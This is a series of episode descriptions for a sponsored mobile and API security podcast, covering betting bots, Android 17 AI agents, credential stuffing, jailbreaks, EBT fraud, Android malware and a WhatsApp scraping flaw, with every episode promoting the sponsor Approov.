Upwardly Mobile - API & App Security News

Episode Summary In this episode of Upwardly Mobile, we dive into the high-stakes world of sports betting and prediction markets like Polymarket, where millions of dollars move in mere seconds. Human bettors are increasingly finding themselves outmatched—not by sharper sports fans, but by high-frequency trading (HFT) bots and AI agents. We explore how "cheating" in mobile betting has rapidly evolved from simple "bonus bagging" and multi-accounting to complex API impersonation, where AI scrapes odds across 50 books simultaneously.Discover why AI-driven solvers have rendered CAPTCHAs useless, and learn about the "Human Tax"—the invisible cost human bettors pay when bots clean out the best lines and force them to accept worse odds. Finally, we discuss how a "Positive Security Model" ensures that only genuine, official mobile apps can place a bet, protecting the integrity of the game.Key Data Points DiscussedThe Arbitrage Gap: Arbitrage windows on prediction markets have collapsed from 12+ seconds to sub-100ms latencies.The $40M Loss: A study of Polymarket revealed that "botted" bettors secured over $40 million in risk-free profits by exploiting price lags humans couldn't see.Bot Dominance: In high-volume markets, automated trading accounts for over 70% of the volume, leaving humans at a severe disadvantage.Compliance Failures: Over 4,800 underage registration attempts were flagged by major sportsbooks in 2025, many of which were likely automated scripts attempting to scale multi-accounting operations.Sponsor This episode is brought to you by Approov. Ensure your platform operates on a Positive Security Model by cryptographically attesting that only your genuine mobile app is accessing your APIs. Learn how Approov addresses the security trust gap at approov.com.Source Materials & Further Reading (Note: As specific URLs were not provided in the source notes, please search these titles to read the full reports):GamblingNews: Botted Bettors Earn $40M Exploiting PolymarketCleanSky: Why Copying Polymarket Whales Will Lose You MoneyApproov Whitepaper: How Approov Addresses the Security Trust GapQuantVPS: Sports Betting Bots on PolymarketKeywords: Sports betting bots, Polymarket exploits, API impersonation, high-frequency trading (HFT) betting, prediction market bots, Positive Security Model, mobile API security, multi-accounting scripts, the Human Tax, arbitrage gaps, cryptograph attestation, mobile app security.  🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Welcome to another episode of Upwardly Mobile, your ultimate guide to defending mobile apps in today’s volatile digital landscape. In this episode, hosts Skye and George unpack the high-stakes security implications of Android 17. As smartphones evolve from passive tools to autonomous "agentic" devices powered by on-device AI and AppFunctions, the attack surface for mobile APIs is expanding dramatically.We explore the critical security trade-offs of these new features, including the rising threats of prompt injection, cross-app data leakage, and the massive "blast radius" if AI agents are tricked into executing unintended actions using legitimate permissions. We also break down Google's latest platform hardening measures, specifically how the Advanced Protection Mode (AAPM) will now block non-accessibility apps from abusing the AccessibilityService API to prevent malware and credential theft. Whether you are an iOS, Android, or HarmonyOS developer, learn how to adapt to these secure-by-default changes and implement a "trust chain" by securing your exposed AI surface area with robust API attestation. Sponsor: This episode is proudly sponsored by Approov Mobile Security, the gold standard in zero-trust mobile app attestation and API security. Approov extends platform security by verifying real apps, preventing bot abuse, and eliminating hard-coded secrets to stop API abuse at the source. Visit approov.com to secure your APIs against ever-advancing cyber threats. Key Topics Discussed:The Rise of Agentic Phones: How Android 17 shifts intelligence directly to the device with Gemini-powered "Magic Actions" and cross-app workflows.AI Agent Risks: The dangers of direct and indirect prompt injection, malicious plugins, and lateral movement across systems.Locking Down the Accessibility API: How Android 17's Advanced Protection Mode enforces stronger least-privilege access by exempting only verified accessibility tools (using the isAccessibilityTool="true" flag) to prevent screen monitoring and automated malware.Platform Hardening for Developers: Essential updates you need to know, including tighter background activity launch (BAL) rules, safer dynamic code loading (DCL) for native libraries, and mandatory local network permission declarations.Defensive Strategies: Why developers must scope AI actions narrowly, separate "read" from "act" permissions, and require explicit user consent for high-risk workflows.Resources & Source Materials:Android 17: Your Phone's AI is Evolving to be More Autonomous – By Joyce Kuo, Approov Mobile SecurityAndroid 17 Blocks Non-Accessibility Apps from Accessibility API to Prevent Malware Abuse – The Hacker News / CyberyamiBehavior changes: Apps targeting Android 17 or higher – Android Developers Official DocumentationSEO Keywords: Android 17 security, mobile app development, API security, AI agents, Gemini AI risks, prompt injection, Advanced Protection Mode, Accessibility API malware, mobile cybersecurity, AppFunctions, app attestation, zero-trust mobile.       🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Episode Summary: Welcome back to "Upwardly Mobile"! In this episode, we dive deep into the rapidly evolving mobile threat landscape defined by the rise of "Agentic AI." With Android 17 set to transform our smartphones into active, on-device AI orchestrators by Summer 2026, the security stakes have never been higher. We unpack the alarming findings from the 2026 Cloudflare Threat Report, which highlights the total industrialization of cyber threats and how attackers are using AI as a massive force multiplier.We also explore why legacy bot defenses—like rate limiting, CAPTCHAs, and behavioral biometrics—are completely failing against modern AI bots that can dynamically rewrite code and mimic human behavior with 99% accuracy. Finally, we discuss how the integration of Cloudflare's edge network with Approov's deterministic device attestation is providing the ultimate defense-in-depth architecture to stop mobile API abuse at the source.If you are attending the RSA Conference (RSAC) in San Francisco this March 2026, be sure to catch up with our sponsors at Approov to learn how to future-proof your mobile architecture!Key Takeaways:The Android 17 Revolution: Android 17 shifts the OS from a reactive tool to an active "agent phone" that orchestrates multi-step workflows across apps. While this brings massive benefits in speed and privacy, it also dramatically expands the attack surface for prompt injections and cross-app data leakage.The Industrialization of Cyber Threats: The 2026 Cloudflare Threat Report reveals that AI has lowered the barrier to entry for highly effective cyber operations, moving the industry toward automated, machine-speed exploits.The Death of Legacy Bot Defenses: Legacy probabilistic defenses like WAFs and CAPTCHAs are failing because multimodal LLM agents can now solve logic puzzles and mimic human "thumb jitter" perfectly.Cryptographic Proof of Life: To stop agentic AI, security must shift from asking "Is this a bot?" to demanding deterministic, cryptographic proof of the device and app's integrity.A New Defense-in-Depth: Combining Cloudflare's global edge network with Approov's deep runtime analysis and "Zero Secrets" architecture ensures that only untampered, legitimate app instances can access your APIs.Sponsor Links:Secure your Mobile APIs today: Visit approov.com to learn how to eliminate hardcoded secrets and implement deterministic device attestation.Source Materials & Further Reading:Android 17: Android Is Becoming an Agent - Are you ready?2026 Cloudflare Threat Report: How adversaries are weaponizing the InternetWhen the Bot Has a Brain: Defending Mobile APIs in the Era of Agentic Attackers (Approov RSAC 2026 Presentation)See You at RSA 2026: Let's Talk Stopping Mobile API Abuse at the SourceKeywords for SEO: Agentic AI, Mobile API Security, Android 17, Cloudflare Threat Report 2026, Approov, Bot Mitigation, RSA Conference 2026, Cybersecurity, Device Attestation, Zero Secrets Architecture, AI Bots, Malware Defense, Prompt Injection, API Abuse.        🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Epic Victory: Google Play's Walled Garden Opens Up & What It Means for DevelopersEpisode Summary: In this episode of Upwardly Mobile, we dive deep into the landmark antitrust settlement between Epic Games and Google that is set to fundamentally reshape the Android app ecosystem globally. After years of legal battles sparked by Epic's "Project Liberty" and the removal of Fortnite from the Play Store, a jury found Google guilty of maintaining an illegal monopoly. We break down the newly announced March 2026 settlement, which significantly drops Play Store commission fees and introduces a game-changing "Registered App Stores" program. What does this mean for mobile developers, app revenue, and Android security? Tune in to find out! Brought to you by Approov: As Android opens its doors to third-party "Registered App Stores" and frictionless sideloading, ensuring your mobile app and APIs are protected from malicious clones and tampering is more critical than ever. Secure your mobile business and authenticate your apps natively with Approov. Key Topics Discussed:The Origins of the Lawsuit: How Epic Games' Tim Sweeney bypassed Google's standard 30% fee by allowing direct purchases in Fortnite, leading to the game's removal and a massive antitrust lawsuit.The Courtroom Battle: The revealing internal practices uncovered during the trial, including Google's "Project Hug" and millions of dollars spent to prevent developers from abandoning the Play Store.The 2026 Settlement Details: How Google is dropping its standard Play Store commission to 20% for in-app purchases and 10% for recurring subscriptions.Registered App Stores Program: A deep dive into Google's new framework that allows alternative Android app stores (like the Epic Games Store) to become "first-class citizens" on Android devices, removing the scary, "doom-laden" security pop-ups previously associated with sideloading.Global Rollout Timeline: When these major fee changes and developer programs will go live, starting in the US, UK, and European Economic Area in June 2026, and expanding globally by September 2027.Source Materials & Further Reading:TechCrunch: Google settles with Epic Games, drops its Play Store commissions to 20%Wikipedia: Epic Games v. GoogleTargeted SEO Keywords: Epic Games vs Google, Google Play Store settlement, Android app ecosystem, Registered App Stores program, mobile app development, third-party app stores, sideloading Android apps, app store commission fees, Tim Sweeney, Fortnite Android return, mobile app security, API protection. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Unpacking the Spotify Exploits: Credential Stuffing, Fake Streams, and Mobile App SecurityEpisode Summary: In this episode of Upwardly Mobile, we dive deep into the digital exploitation landscape of one of the world's largest audio streaming platforms. We break down the massive credential stuffing attack that compromised 350,000 Spotify users, exposing the dangers of poor password hygiene and unsecured databases. We also explore the ongoing controversies surrounding Spotify, including lawsuits over artificial streaming, bot farms, and the platform's "Discovery Mode". Additionally, we highlight a growing trend where malicious actors are weaponizing Spotify's search features to promote pirated software, phishing schemes, and malware. Finally, we pivot to actionable solutions for developers, exploring how Zero Trust Runtime Protection and App Attestation can prevent automated mobile attacks. Brought to you by Approov: Don't let bots, scripts, or fake apps compromise your platform. Learn how to stop credential stuffing and secure your APIs at approov.com.Sponsor Spotlight: Approov Mobile Security Are your mobile apps and APIs safe from automated credential stuffing, emulators, and Man-in-the-Middle (MitM) attacks? Approov ensures that only genuine mobile app instances running in safe environments can access your APIs, blocking scripts, modified apps, and bots in real-time. 👉 Secure your mobile platforms today at approov.com. Source Materials & Further Reading:350,000 Spotify users hacked in credential stuffing attack | IT ProSpotify Finds Itself At The Centre Of Payola And Fake Stream Storm | Noise11.comSpotify misused for scams and malware | Digital Watch ObservatoryStrategies to Stop Credential Stuffing Attacks on Mobile Apps | ApproovKeywords: Credential stuffing, mobile app security, Spotify hack, artificial streaming, bot farms, zero trust runtime protection, API security, mobile malware, phishing schemes, app attestation, Approov. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Episode Summary: In this episode of Upwardly Mobile, we dive deep into a shocking new cybersecurity report revealing that millions of users' highly sensitive medical data may be at risk. We discuss the recent discovery of 1,500 vulnerabilities across 10 incredibly popular mental health apps—which have been downloaded over 14 million times. From leaked therapy transcripts and mood logs to the high black-market value of these stolen health records, we unpack the unique risks threatening the digital healthcare space today.Finally, we explore actionable solutions for healthcare providers and developers to lock down their platforms, featuring insights on Runtime Application Self-Protection (RASP), dynamic certificate pinning, and end-to-end API security.Key Topics Discussed in This Episode:The Mental Health App Crisis: How researchers at Oversecured uncovered 54 high-severity flaws in leading mental health applications, leaving sensitive data like Cognitive Behavioral Therapy (CBT) session notes and medication schedules exposed.The Black Market for Health Data: Why cybercriminals are targeting therapy records, which can sell for upwards of $1,000 each—far more than stolen credit card numbers.Common Developer Pitfalls: The dangers of outdated apps, plaintext configuration data, hardcoded Firebase URLs, and insecure encryption keys.Securing Mobile Health: How technologies like Runtime Application Self-Protection (RASP) and dynamic certificate pinning can prevent Man-in-the-Middle (MitM) attacks, block bots, and ensure HIPAA and GDPR compliance.Sponsor: This episode is brought to you by Approov. Approov provides complete, end-to-end protection for mobile health apps and APIs. Their lightweight SDK and RASP technology can be deployed in just a single sprint to block bot attacks, prevent credential stuffing, and stop API abuse. Ensure your patients' health data is safe, even on jailbroken devices or insecure Wi-Fi networks. Learn how to protect your revenue and patient trust at approov.com.Resources & Source Materials:TechRadar Report: Multiple mental health apps riddled with high severity security flaws — data of millions put at risk, so be on your guardApproov Mobile Health Security: Ensure Security and Trust for Healthcare AppsSEO Keywords: Mobile app security, mental health apps, healthcare data breach, API security, mobile health compliance, HIPAA compliance mobile apps, RASP technology, cybersecurity podcast, Oversecured vulnerabilities, patient data protection, Approov mobile security.      🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Welcome to another episode of Upwardly Mobile! In this episode, we take a deep dive into the evolution of runtime security for mobile API access. Traditional methods like API keys are easily stolen because they are static and stored directly inside the user's app. To combat this vulnerability, we explore the groundbreaking "Triangle of Trust" architecture developed by CriticalBlue, the company behind the Approov mobile security service. We unpack the technical details of US Patent 11,163,858 B2, titled "Client Software Attestation," which establishes a Zero Trust proof of software integrity for apps operating on the public internet. This episode breaks down how the patented system calculates a cryptographic hash fingerprint of an executing code image to detect tampering in real-time, ensuring that malicious actors cannot spoof access. We also discuss how Approov's platform-agnostic approach provides a significant competitive advantage over OS-native solutions like Google Play Integrity and Apple App Attest, especially in global markets featuring Huawei's HarmonyOS NEXT and non-GMS Android devices. Key Takeaways from this Episode:The Triangle of Trust: A tripartite architecture separating the security check from the access itself, involving an Issuer (Approov Cloud Attestation Server), a Holder (the Mobile Client Device), and a Verifier (the Backend Server Device).Dynamic Code Fingerprinting: How client applications calculate a cryptographic hash of their own executing code image to prove integrity, ensuring no sensitive "master keys" are ever stored on the device where they could be extracted.Protection Against Advanced Threats: The system's ability to thwart "living-off-the-land" attacks (like memory hooking with Frida) and Man-in-the-Middle (MITM) attacks by verifying code dynamically in memory, rather than just checking the static OS state.Superiority Over OS-Native Tools: Why a unified, cross-platform attestation approach is critical for the global market, bypassing the latency, platform restrictions, and hardware dependencies of Google Play Integrity and Apple App Attest.A Defensible Security Moat: An analysis of why CriticalBlue's patent is highly defensible and has been cited over 60 times as prior art, acting as a major technical blocker for competitors in the cybersecurity industry.Sponsor: This episode is brought to you by Approov. Stop relying on static API keys and secure your mobile business with deterministic, zero-trust software integrity. With global reach across iOS, GMS Android, non-GMS Android, and HarmonyOS, Approov ensures your backend APIs are shielded from malicious bots and tampered apps. Visit approov.com to learn more and secure your mobile ecosystem today. Source Materials & Relevant Links:US Patent 11,163,858 B2: Client Software Attestation by Richard Michael Taylor / Critical Blue Ltd. (Filed 2015, Granted Nov 2, 2021).Whitepaper Excerpt: Attestation: The Triangle of Trust.Approov Official Website: approov.comSEO Keywords: Mobile API security, Zero Trust architecture, App attestation, Approov, CriticalBlue, Cryptographic hash fingerprint, Google Play Integrity alternative, Apple App Attest alternative, Man-in-the-Middle protection, US Patent 11163858, Mobile app tampering, Cybersecurity podcast. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

The "Rootless" Revolution: Inside the Dopamine Jailbreak & The EBT Security Crisis🎧 Episode Summary In this episode of Upwardly Mobile, we dive into two critical stories reshaping the mobile security landscape. First, we unpack the architecture of Dopamine, the modern "rootless" jailbreak that has cracked iOS 15 and iOS 16 without touching the system partition. We explore how it bypasses Apple’s Signed System Volume (SSV) and what this means for app developers trying to detect compromised devices. Then, we shift gears to a systemic failure in government fintech: why the "Lock Card" feature in EBT mobile apps is failing to stop fraud. We break down how attackers are bypassing mobile controls using legacy magstripe rails and bot attacks.🚀 Key Topics DiscussedThe Dopamine Architecture: Understanding the shift from "rootful" to "rootless" jailbreaking.How it Works: The exploit chain, including PAC and PPL bypasses, and the creation of the fake root environment in /var/jb.Detection Challenges: Why traditional jailbreak detection methods struggle against rootless environments and the reliance on finding tweak injection libraries like ElleKit.The EBT Mobile Failure: Why locking your EBT card in the mobile app doesn't actually stop thieves at the register.API Abuse: How botnets are hammering IVR and app APIs to time their theft perfectly.🔗 Resources & Links Dopamine Jailbreak:Official Project: Dopamine GitHub (opa334)Installation Guide: iOS CFW GuideTechnical Insight: ElleKit - Tweak InjectionEBT & Mobile Fraud Analysis:The Mechanics of Theft: Propel: How EBT Benefits are StolenSystemic Vulnerabilities: Pennsylvania Office of State Inspector General🛡️ Sponsor This episode is brought to you by Approov. Is your mobile app running on a jailbroken device? Are bots scraping your API endpoints? Approov provides a comprehensive mobile security solution that ensures only genuine mobile app instances, running on safe mobile environments, can access your backend APIs. 👉 Learn more at: approov.com 🔍 SEO Keywords Dopamine Jailbreak, Rootless Jailbreak, iOS 15 Jailbreak, iOS 16 Security, Mobile App Security, EBT Fraud, Skimming, API Security, Sideloading, TrollStore, Magstripe Vulnerabilities, App Attestation.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Beyond the Hardware: Why Key Attestation Is Just a Receipt, Not a Security StrategyIn this episode of Upwardly Mobile, we dive deep into the often-misunderstood world of mobile app security to debunk the myth that hardware-backed key attestation is a "silver bullet." Drawing from expert analysis by Approov, Oasis, and community discussions, we explore why relying solely on Apple’s App Attest or Google’s Play Integrity can leave your APIs vulnerable to sophisticated attacks like device farming and runtime instrumentation. We explain why attestation is merely a "snapshot" in time and how to implement a true defense-in-depth strategy. Key Takeaways:The Hardware Myth: Companies like Google and Apple promote hardware-backed key attestation (using TEEs or Secure Elements) as a primary security measure, but this approach has critical limitations when used in isolation. While it proves a cryptographic key is stored in secure hardware, it does not guarantee the integrity of the app calling that key or the user operating it.The "Receipt" Analogy: Remote attestation is effectively just a receipt proving that a specific binary ran on specific hardware at a specific moment. It fails to prove that the state hasn't been rolled back, that the operator isn't malicious, or that the inputs haven't been manipulated since that snapshot was taken.The Threat of Device Farms: Attackers can physically amass legitimate iPhones in "Device Farms" to generate valid App Attest tokens. These tokens are then sold via APIs to bots, allowing scripts to impersonate genuine devices and bypass standard hardware checks.Runtime Manipulation: Tools like Frida and Magisk allow hackers to hook into API calls and forge attestation results or manipulate the application's behavior after the boot process. Without Runtime Application Self Protection (RASP), a validly attested device can still run a compromised app.The Solution is Multi-Layered: Effective security requires moving verification off the device to the cloud and implementing dynamic checks. A robust strategy includes RASP, dynamic certificate pinning, and cloud-based mobile attestation that verifies the app's integrity continuously, not just at boot.Featured Resources & Source Material:Article: Limitations of Hardware-Backed Key Attestation in Mobile Security – An analysis of why verification must always occur off-device.Article: How to Defeat Apple DeviceCheck and AppAttest – A technical look at how hackers bypass iOS security using instrumentation and device farms.Community Insight: TEE Attestation Isn’t Trust It’s Just a Receipt – A breakdown of why attestation does not equal trust.Deep Dive: Attestation Is not Enough – Exploring the nuances of remote attestation within trust systems.Definition: Trusted Execution Environment (Wikipedia) – Understanding the history and hardware behind TEEs.Sponsored By: This episode is brought to you by Approov. Approov Mobile Security provides a comprehensive solution that goes beyond simple attestation. By combining RASP, dynamic certificate pinning, and cloud-based verification, Approov ensures that only genuine, untampered instances of your app can access your APIs.Website: approov.comTalk to an Expert: Schedule a CallCheck Your Security: Approov Mobile App AssessmentKeywords: Mobile Security, API Security, App Attestation, RASP, Device Farms, Man-in-the-Middle Attacks, Jailbreak Detection, Apple App Attest, Google Play Integrity, Approov, Cybersecurity, Trusted Execution Environment (TEE). 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Episode Summary In this episode of Upwardly Mobile, we investigate a growing financial crisis affecting the nation’s most vulnerable families. The USDA now estimates that up to $12 billion is stolen annually from the Supplemental Nutrition Assistance Program (SNAP). We explore how transnational criminal rings are using sophisticated technology—from physical skimmers to brute-force cyberattacks—to drain EBT cards in seconds.We also break down why the government’s latest solution—mobile apps that allow users to "lock" their cards—is failing to stop the theft. We analyze the technical vulnerabilities of the legacy magstripe system and explain why app-based controls are often bypassed by backend fraud and race conditions.This episode is sponsored by Approov. Mobile apps are now the front door to critical services, but as we discuss in this episode, they are only as strong as the security frameworks behind them. Approov provides comprehensive mobile app protection, ensuring that the requests hitting your API are from genuine apps running on untampered devices.Key Topics & Takeaways:• The Scale of the Problem: Federal investigators estimate that SNAP fraud has hit all-time highs, potentially reaching $12 billion annually. Georgia alone reported nearly $23 million stolen in just the first quarter of 2025.• How the Fraud Works: Criminals are utilizing advanced skimming technology and "brute force" software that can guess a four-digit PIN in less than a second. The Secret Service notes that these are often transnational organized crime groups capable of working easily across borders.• The "Lock" Feature Failure: Many states, including Georgia, encouraged users to download apps like ConnectEBT to "lock" their cards. However, users like Sheria Robertson report having funds stolen mere minutes after unlocking the app to make a purchase.• The Technical Vulnerability: The core issue is that EBT cards still rely on legacy magnetic stripe technology rather than secure chips (EMV). Because the backend system relies on static track data and a PIN, the mobile app’s "lock" feature is often bypassed by race conditions or bot attacks on IVR systems.• Bot Attacks: Cybercriminals are using bots to hammer IVR systems to check balances and time their withdrawals the moment funds are deposited.Featured Stories & Data:• Victim Spotlight: Sheria Robertson, a single mother who lost her Thanksgiving food budget to thieves in Brooklyn, NY, despite being in Georgia and using the app's security features.• Investigator Insight: Mark Haskins from the USDA Food and Nutrition Service explains that criminals are "taking it to the next level" with cyber and brute force attacks.• State Data: Top states for reported fraud include Georgia, New York, and California.Relevant Links & Resources:• USDA SNAP Replacement of Stolen Benefits Dashboard• Report Fraud: USDA Office of Inspector General Hotline [(800) 424-9121]• Technical Deep Dive: Security Vulnerabilities and Fraud Mechanics in EBT Systems• News Coverage: WSB-TV: Georgia officials say state SNAP system subject to cyberattack• Propel App Resource: How are EBT benefits being stolen?Keywords:SNAP fraud, EBT skimming, food stamp theft, mobile app security, Approov, ConnectEBT, cybercrime, magnetic stripe vulnerability, USDA, social safety net, financial fraud, IVR bot attacks.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

In this episode, we explore the landscape of "privacy-first" smartphones, focusing on the newly unveiled Punkt MC03. We break down whether this Swiss-designed, German-made device can finally offer a viable alternative to the data-harvesting giants of the mobile world. We discuss the trade-offs of leaving the Google ecosystem, the unique "subscription-based" operating system model, and whether the return of the removable battery signals a shift in hardware trends. Key Topics & Timestamps:The "De-Googled" Promise: The Punkt MC03 runs AphyOS, a custom version of Android that strips out Google Mobile Services to minimize background tracking and profiling.AphyOS & The Subscription Model: Unlike standard Android phones, the MC03 relies on a subscription model (approx. $10/month after the first year) to fund security updates and infrastructure rather than selling user data to ad networks.Security Architecture: The device splits the user experience into a secure "Vault" for vetted apps (like Proton and Signal) and a "Wild Web" environment for general Android apps, allowing users to isolate risky applications.Hardware Highlights: The phone features a 6.67" OLED screen, IP68 rating, and a 5,200 mAh removable battery—a design choice driven by upcoming EU regulations regarding repairability.Overcoming Past Failures: We discuss how the MC03 improves upon the "difficult-to-recommend" MC02 with a smoother onboarding process, an improved 64MP camera, and the option to install the Play Store for users who can't go fully cold-turkey.The Competition: How the MC03 stacks up against other privacy-focused devices like the Murena Fairphone and other non-GMS ROMs like GrapheneOS.Sponsor: This episode is brought to you by Approov. Protect your mobile APIs from scripts, bots, and modified apps. Ensure that the requests you receive are from the genuine mobile app you released.Visit approov.com to learn more about comprehensive mobile app security.Relevant Links & Source Materials:ZDNET Review: Want real phone privacy? This $700 handset promises it – Coverage of the US launch, pricing, and removable battery features.Android Police Coverage: Can you de-Google without the headache? – An in-depth look at the onboarding improvements and specs.Punkt Official Site: The MC03 Product Page – Direct specs and philosophy from the manufacturer.Murena / /e/OS: The Murena Fairphone Review – Context on the competitor mentioned in the episode.Keywords: Punkt MC03, AphyOS, Non-GMS, De-Google, Mobile Privacy, Data Sovereignty, Removable Battery, Android Security, Fairphone, Murena, Apostrophy OS, Mobile Security. Disclaimer: Information regarding pricing ($699 device / $10 monthly sub) and release dates (Spring 2026 for US) is based on reports from ZDNET and Android Police coverage of CES 2026.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

In this episode of Upwardly Mobile, we dive deep into the evolving landscape of Android malware. We break down the emergence of Wonderland (formerly WretchedCat), a sophisticated SMS stealer targeting users in Uzbekistan through legitimate-looking "dropper" applications. We explore how threat actors, specifically the "TrickyWonders" group, are leveraging Telegram and malicious ad campaigns to bypass security checks and hijack devices. We also discuss the broader trend of Malware-as-a-Service (MaaS), including new threats like Cellik, Frogblight, and NexusRoute that are lowering the barrier to entry for cybercriminals globally. From real-time screen streaming to bypassing Google Play protections, we analyze the tactics defining modern mobile security threats. Key Topics Discussed:The Rise of Droppers: How malware operators are shifting from "pure" Trojans to "droppers" (like MidnightDat and RoundRift) that appear harmless to evade detection before deploying payloads.Wonderland's Capabilities: How this malware establishes bidirectional communication to intercept OTPs, steal contacts, and execute USSD requests.The MaaS Economy: A look at the "Cellik" RAT, which offers one-click APK building to bundle malware inside legitimate apps, and "Frogblight," which targets users via fake court documents.Government Impersonation: How "NexusRoute" is targeting users in India by mimicking government service portals to steal financial data and UPI PINs.Defense Strategies: The importance of blocking unknown source installations and monitoring for suspicious SMS/USSD patterns.Sponsored By: This episode is brought to you by Approov. Stop mobile app abuse and API misuse. Ensure that the requests your API handles are from the genuine mobile app running on a safe mobile device. 👉 Visit our sponsor: https://approov.io Relevant Links & Source Materials:The Hacker News: Android Malware Operations Merge Droppers, SMS Theft, and RAT Capabilities at ScaleSC Media: Android malware Wonderland evolves with dropper apps targeting UzbekistanCypro: Security Analysis of Android Malware OperationsKeywords: Android Malware, Wonderland, SMS Stealer, Dropper Apps, Mobile Security, Remote Access Trojan (RAT), TrickyWonders, Cybersecurity, One-Time Password (OTP) Theft, Malware-as-a-Service, Approov.     🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

2026 Mobile API and AI Security PredictionsEpisode Summary: In this episode of Upwardly Mobile, we audit the accuracy of Approov’s 2025 cybersecurity forecast. Of the seven trends predicted, four proved to be "absolutely correct." We break down these key hits: the dual-use of AI by attackers and defenders, the undeniable dominance of cross-platform development, the crackdown on open-source supply chain risks, and the heavy impact of new global breach reporting mandates.The 4 Mobile Security Trends That Defined the YearKey Topics — The 4 Correct Predictions:• 1. AI’s Double-Edged Sword: We discuss how 2025 wasn't just about AI hype—it was about operational impact. Attackers utilized LLMs to lower the bar for API abuse and generate scripts to bypass WAFs, while defenders leaned on AI for anomaly detection and scan interpretation to speed up code reviews.• 2. Cross-Platform is King: The prediction that cross-platform development would be "the way forward" held true. We analyze how Flutter and React Native maintained dominance in 2025, becoming the norm for enterprise and fintech apps, though Huawei’s HarmonyOS remained a regional outlier.• 3. The Open Source Crackdown: Scrutiny on open-source software (OSS) intensified as predicted. With attackers targeting ecosystems like npm and PyPI, and regulations like the EU CRA enforcing SBOMs, organizations were forced to verify their supply chains and adopt runtime protection to catch tampering.• 4. The Breach Reporting Crunch: Approov correctly forecasted that breach reporting would demand massive investment. With the EU NIS2 Directive and PCI DSS 4.0 coming into full effect, the focus shifted from simple disclosure to operational resilience—requiring companies to report incidents in hours, not days.Featured Resources & Links:• Approov Report: Approov Predicted 7 Mobile Cybersecurity Trends for 2025 - Did They Happen? – The full retrospective on which predictions hit the mark and which were too optimistic (like the adoption of certificate pinning).• Expert Insights: LW Roundtable: Mandates Surge, Guardrails Lag – Further reading on the friction between compliance mandates and security realities.Sponsor: This episode is brought to you by Approov. Don’t let your mobile app be the weak link. Approov provides comprehensive runtime security, ensuring that only your genuine app communicates with your API.• Visit: approov.io• Solutions: Runtime Secrets Protection and Mobile API Security.Keywords: Mobile Security, Cybersecurity Predictions, AI Threats, Flutter, ReactNative, Open Source Security, SBOM, NIS2 Compliance, Supply Chain Attacks, Approov, API Security. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

The 3.5 Billion WhatsApp Scraping Flaw: Is Your Mobile API Leaking?Episode Summary: In this episode, we break down a massive vulnerability discovered by researchers at the University of Vienna and SBA Research that allowed them to scrape data from roughly 3.5 billion WhatsApp accounts globally. We explore how a lack of rate limiting on the specific GetDeviceList API endpoint turned a benign contact discovery feature into a massive "enumeration oracle," allowing a single university server to query over 100 million numbers per hour. We discuss the types of data exposed—including active status, device types, public encryption keys, and millions of profile photos—and the implications for user privacy, particularly in regions where WhatsApp is banned like China and Iran. Finally, we cover Meta’s response to the disclosure and why industry experts are calling this a "masterclass in negligence" regarding API security. Key Topics Discussed:The Vulnerability: How researchers used the GetDeviceList API to bypass safeguards and identify valid accounts across 245 countries.The Scale: How a single server sustained 7,000 requests per second to verify 3.5 billion accounts without being blocked.The Data: The exposure of profile images, "about" text, and public keys, and how this data correlates with previous Facebook leaks.The Security Lesson: Why "does this number exist?" lookup APIs are inherently dangerous without strict behavioral monitoring and rate limiting.Sponsor: This episode is supported by Approov. When mobile app security is an afterthought, user privacy becomes collateral damage. Approov ensures that only genuine mobile app instances, running on safe mobile devices, can access your backend APIs.Visit the Sponsor: https://approov.ioFeatured Sources & Further Reading:BleepingComputer: WhatsApp API flaw let researchers scrape 3.5 billion accounts – Detailing the mechanics of the GetDeviceList abuse and the global scope of the data scrape.Malwarebytes: WhatsApp closes loophole that let researchers collect data on 3.5B accounts – Analysis of the privacy implications, including the exposure of users in restrictive regimes.Privacy Guides: WhatsApp contact discovery vulnerability identifies 3.5 billion users – Discussing the patch and how alternative messengers handle contact discovery.Keywords: WhatsApp, API Security, Rate Limiting, Data Scraping, Mobile Security, Cybersecurity, Meta, Privacy, Enum, GetDeviceList, Infosec, Approov. 